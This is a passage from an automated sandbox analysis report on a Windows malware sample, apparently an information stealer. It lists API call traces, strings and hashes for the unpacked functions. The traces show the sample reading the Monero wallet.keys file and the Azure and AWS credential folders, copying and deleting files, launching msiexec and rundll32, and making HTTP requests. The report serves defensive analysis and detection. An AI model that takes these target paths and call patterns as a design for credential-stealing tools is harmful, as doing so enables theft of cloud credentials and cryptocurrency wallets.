                          • Opcode ID: a5e78b1671ab8cccf3dd0e3b44ef8ee317011af682a3ba12f1a24b63c82f4f50
                          • Instruction ID: 4fe5008577e77f848ccdd22cc63bebaf06785da60911554bdb810d3a71430771
                          • Opcode Fuzzy Hash: a5e78b1671ab8cccf3dd0e3b44ef8ee317011af682a3ba12f1a24b63c82f4f50
                          • Instruction Fuzzy Hash: C6121E71920318AADB15EBA4DC95FEEB7B8BF14700F4045E9B106B20D1EF706A4ACF61
                          Function 00AFCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B08B60: GetSystemTime.KERNEL32(00B10E1A,018AEBF0,00B105AE,?,?,00AF13F9,?,0000001A,00B10E1A,00000000,?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B08B86
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AFCF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AFD0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AFD0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD208
                          • lstrcat.KERNEL32(?,00B11478), ref: 00AFD217
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD22A
                          • lstrcat.KERNEL32(?,00B1147C), ref: 00AFD239
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD24C
                          • lstrcat.KERNEL32(?,00B11480), ref: 00AFD25B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD26E
                          • lstrcat.KERNEL32(?,00B11484), ref: 00AFD27D
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD290
                          • lstrcat.KERNEL32(?,00B11488), ref: 00AFD29F
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD2B2
                          • lstrcat.KERNEL32(?,00B1148C), ref: 00AFD2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 00AFD2D4
                          • lstrcat.KERNEL32(?,00B11490), ref: 00AFD2E3
                            • Part of subcall function 00B0A820: lstrlen.KERNEL32(00AF4F05,?,?,00AF4F05,00B10DDE), ref: 00B0A82B
                            • Part of subcall function 00B0A820: lstrcpy.KERNEL32(00B10DDE,00000000), ref: 00B0A885
                          • lstrlen.KERNEL32(?), ref: 00AFD32A
                          • lstrlen.KERNEL32(?), ref: 00AFD339
                            • Part of subcall function 00B0AA70: StrCmpCA.SHLWAPI(018A8AB8,00AFA7A7,?,00AFA7A7,018A8AB8), ref: 00B0AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 00AFD3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 58da37aa97251d9fc90e3a0c996852435ae42512281692d045480689906aa207
                          • Instruction ID: 1b27a91aef533b5de01e44638323175271823392d9ffab1e6dba442190303845
                          • Opcode Fuzzy Hash: 58da37aa97251d9fc90e3a0c996852435ae42512281692d045480689906aa207
                          • Instruction Fuzzy Hash: 6DE10D71A10308ABCB04EBA4DD96EEE77B8AF14301F504598F147B61E1DE35AE45CB72
                          Function 00AFC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,018ADA90,00000000,?,00B1144C,00000000,?,?), ref: 00AFCA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00AFCA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00AFCA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AFCAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00AFCAD9
                          • StrStrA.SHLWAPI(?,018ADA30,00B10B52), ref: 00AFCAF7
                          • StrStrA.SHLWAPI(00000000,018AD868), ref: 00AFCB1E
                          • StrStrA.SHLWAPI(?,018AE3E8,00000000,?,00B11458,00000000,?,00000000,00000000,?,018A8BB8,00000000,?,00B11454,00000000,?), ref: 00AFCCA2
                          • StrStrA.SHLWAPI(00000000,018AE448), ref: 00AFCCB9
                            • Part of subcall function 00AFC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00AFC871
                            • Part of subcall function 00AFC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00AFC87C
                          • StrStrA.SHLWAPI(?,018AE448,00000000,?,00B1145C,00000000,?,00000000,018A8BD8), ref: 00AFCD5A
                          • StrStrA.SHLWAPI(00000000,018A8A48), ref: 00AFCD71
                            • Part of subcall function 00AFC820: lstrcat.KERNEL32(?,00B10B46), ref: 00AFC943
                            • Part of subcall function 00AFC820: lstrcat.KERNEL32(?,00B10B47), ref: 00AFC957
                            • Part of subcall function 00AFC820: lstrcat.KERNEL32(?,00B10B4E), ref: 00AFC978
                          • lstrlen.KERNEL32(00000000), ref: 00AFCE44
                          • CloseHandle.KERNEL32(00000000), ref: 00AFCE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: e1a2da2e4a9f399e9740608af0bf93b856ecef79096a7270422614b14b371a3a
                          • Instruction ID: cd438207a6eb784ad48a5e831fbf18edd32b340096e98d0f35e06444c44fcc61
                          • Opcode Fuzzy Hash: e1a2da2e4a9f399e9740608af0bf93b856ecef79096a7270422614b14b371a3a
                          • Instruction Fuzzy Hash: AEE1DF71910308ABDB15EBA4DD95FEEBBB8AF14300F408599F106B71D1EF346A4ACB61
                          Function 00B08320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • RegOpenKeyExA.ADVAPI32(00000000,018ABBD0,00000000,00020019,00000000,00B105B6), ref: 00B083A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B08426
                          • wsprintfA.USER32 ref: 00B08459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B0847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B0848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B08499
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: d40f2f8603e5b44a4fe8497d18c74f175350e1e8af1c2d63b45c83e8df3c3169
                          • Instruction ID: b167b7e63a3f6a964770c656180754fb6810950f81491e67803d950101171ef4
                          • Opcode Fuzzy Hash: d40f2f8603e5b44a4fe8497d18c74f175350e1e8af1c2d63b45c83e8df3c3169
                          • Instruction Fuzzy Hash: F3811D719102189BDB24DB54CC95FEABBB8FF48700F0086D9E149A6190DF71AF85CFA1
                          Function 00B04D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00B04DCD
                            • Part of subcall function 00B04910: wsprintfA.USER32 ref: 00B0492C
                            • Part of subcall function 00B04910: FindFirstFileA.KERNEL32(?,?), ref: 00B04943
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00B04E59
                            • Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B10FDC), ref: 00B04971
                            • Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B10FE0), ref: 00B04987
                            • Part of subcall function 00B04910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B04B7D
                            • Part of subcall function 00B04910: FindClose.KERNEL32(000000FF), ref: 00B04B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00B04EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00B04EE5
                            • Part of subcall function 00B04910: wsprintfA.USER32 ref: 00B049B0
                            • Part of subcall function 00B04910: StrCmpCA.SHLWAPI(?,00B108D2), ref: 00B049C5
                            • Part of subcall function 00B04910: wsprintfA.USER32 ref: 00B049E2
                            • Part of subcall function 00B04910: PathMatchSpecA.SHLWAPI(?,?), ref: 00B04A1E
                            • Part of subcall function 00B04910: lstrcat.KERNEL32(?,018AFC80), ref: 00B04A4A
                            • Part of subcall function 00B04910: lstrcat.KERNEL32(?,00B10FF8), ref: 00B04A5C
                            • Part of subcall function 00B04910: lstrcat.KERNEL32(?,?), ref: 00B04A70
                            • Part of subcall function 00B04910: lstrcat.KERNEL32(?,00B10FFC), ref: 00B04A82
                            • Part of subcall function 00B04910: lstrcat.KERNEL32(?,?), ref: 00B04A96
                            • Part of subcall function 00B04910: CopyFileA.KERNEL32(?,?,00000001), ref: 00B04AAC
                            • Part of subcall function 00B04910: DeleteFileA.KERNEL32(?), ref: 00B04B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 571eb5efcdd462553d058d8fb7f1433a721eaec5cc375f2685f364ff518c9dae
                          • Instruction ID: 0dc2a6bd7a27bdff939046b13c39aac6e6d5ac067cdcd1d81d25e910b252c865
                          • Opcode Fuzzy Hash: 571eb5efcdd462553d058d8fb7f1433a721eaec5cc375f2685f364ff518c9dae
                          • Instruction Fuzzy Hash: AD4195BAA5030867C750F770DC47FED37B8AB24700F4049D4B28AA61D1EEB597C98B92
                          Function 00B09010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B0906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 977ce9d36932740b5e164fd1b4ac2aac775d63085e66d025c48d580c860630ba
                          • Instruction ID: 8016809851ec3676bc02ea2ac716fcd224c39c492f0efb9717218d56eb139c1d
                          • Opcode Fuzzy Hash: 977ce9d36932740b5e164fd1b4ac2aac775d63085e66d025c48d580c860630ba
                          • Instruction Fuzzy Hash: 1571CEB5A10308ABDB04DBE8DD89FEEBBB8BB48700F108548F655E7290DB759905CB61
                          Function 00B02E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00B031C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00B0335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00B034EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: 5be7483d867183b9dba93853be4095e7091036ffb852d4772d06e274213dd233
                          • Instruction ID: 9fa2e7be85eaa226c4bac62a6ae09e47510b6bc47859a862c555ee00d756d0a4
                          • Opcode Fuzzy Hash: 5be7483d867183b9dba93853be4095e7091036ffb852d4772d06e274213dd233
                          • Instruction Fuzzy Hash: F312ED719103089ADB05FBA0DD92FDEBBB8AF24300F5085D9E506761D1EF746B4ACB62
                          Function 00B052C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF6280: InternetOpenA.WININET(00B10DFE,00000001,00000000,00000000,00000000), ref: 00AF62E1
                            • Part of subcall function 00AF6280: StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF6303
                            • Part of subcall function 00AF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AF6335
                            • Part of subcall function 00AF6280: HttpOpenRequestA.WININET(00000000,GET,?,018AF500,00000000,00000000,00400100,00000000), ref: 00AF6385
                            • Part of subcall function 00AF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AF63BF
                            • Part of subcall function 00AF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF63D1
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B05318
                          • lstrlen.KERNEL32(00000000), ref: 00B0532F
                            • Part of subcall function 00B08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B08E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00B05364
                          • lstrlen.KERNEL32(00000000), ref: 00B05383
                          • lstrlen.KERNEL32(00000000), ref: 00B053AE
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 27b1d6ab9d7d79810680b6aef0bf566d314c07ff786a4b183468bf9a1d1dbe46
                          • Instruction ID: 93cfe9ad2c223db70a784705ba3ace83237d8a9ff6d11d01dafc560fdcca31b9
                          • Opcode Fuzzy Hash: 27b1d6ab9d7d79810680b6aef0bf566d314c07ff786a4b183468bf9a1d1dbe46
                          • Instruction Fuzzy Hash: 4751FB709102489BCB14EF64CD96FEE7BB9EF14301F508898F506AA5D1EF34AB45CB62
                          Function 00B012D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
